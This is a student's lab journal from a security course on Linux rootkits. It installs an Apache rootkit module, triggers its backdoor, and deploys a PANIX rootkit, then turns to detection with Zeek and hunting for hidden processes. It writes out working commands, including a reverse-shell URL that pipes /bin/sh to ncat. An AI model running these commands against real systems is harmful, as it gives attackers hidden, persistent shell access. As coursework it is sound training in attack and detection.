SEC 440 Linux Rootkits - JadenGil/Jaden-Tech-Journal GitHub Wiki

Installing Apache RootKit on Ubuntu:

On my Xubuntu machine in the terminal emulator I need to run the following commands:

sudo apt update

sudo apt install apache2 apache2-dev apache2-utils ncat

cd /tmp

wget -c https://github.com/vxunderground/MalwareSourceCode/blob/main/Linux/Rootkits/Rootkit.Linux.Apache-rootkit.7z

7z e Rootkit.Linux.Apache-rootkit.7z

sudo apxs -c -i mod_authg.c

Output from sudo apt install apache2 apache2-dev apache2-utils ncat:

image

Contents of /tmp after installation:

image

Output after running wget -c https://github.com/vxunderground/MalwareSourceCode/blob/main/Linux/Rootkits/Rootkit.Linux.Apache-rootkit.7z:

image

Output after 7z e Rootkit.Linux.Apache-rootkit.7z:

image

Output after running sudo apxs -c -i mod_authg.c:

image

Added the following to the end of the apache2.conf file:

image

Now restart apache and run the command lynx -mime_header http://localhost/authg?c=id

NOTE: You may need to install Lynx with sudo apt install lynx

Deliverable 1:

image

Now on the kali box we can test that everything worked with the command in this screenshot:

image

Shell access w/ Apache backdoor:

On the kali box we need to run the following:

nc -vnlp 5555

http://ubuntu-ip-address/authg?c='/bin/sh|%20ncat%20kali-ip-address%205555%20-e%20/bin/bash

Initial output:

image

You can see in that image that the listener has connected to the webpage

Deliverable 2:

image

Time for Zeek

Deliverable 3:

image

image

The first screenshot suggests the activity might involve command injection or malicious use of HTTP to compromise a server because of the following we can tell:

Source (id.orig_h & id.orig_p): 192.168.1.10:43250 is the client that initiated the request.

Destination (id.resp_h & id.resp_p): 192.168.1.20:80 is the server that responded.

HTTP Method (method): GET is used to request a resource.

URI: /authg?c=/bin/sh|ncat indicates a potential exploit attempt to execute a shell command using ncat.

Status Code (status_code): 200 confirms the server responded successfully

In the second screenshot, the rejected and reset TCP connections suggest scanning or probing behavior, potentially a reconnaissance phase

Installing panix:

We can install panix with the following command curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.0/panix.sh -o panix.sh

We also need to make sure we have the appropriate privs by using chmod +x panix.sh

image

We can use panix to deploy a rootkit by using the command sudo ./panix.sh --rootkit --secret "P4N1X" --identifier "panix"

Deliverable 4:

image

image

Hiding Process with Panix:

Deliverable 5:

image

Finding hidden processes:

Deliverable 6:

image

Deliverable 7:

image

Deliverable 8:

By using the command ls -l /proc/8650/fd/* | grep 4444 It provides the socket information including the inode # for the socket.

Reflection:

While this lab didn't take very long it was definitely a little frustrating. I had a really hard time at the end finding the socket information despite reading through the mailing list provided in the lab. I am not entirely sure why this particularly stumped me be after some more research outside of the email chain I was able to figure out that the command ls -l /proc/8650/fd/* | grep 4444 was what I was looking for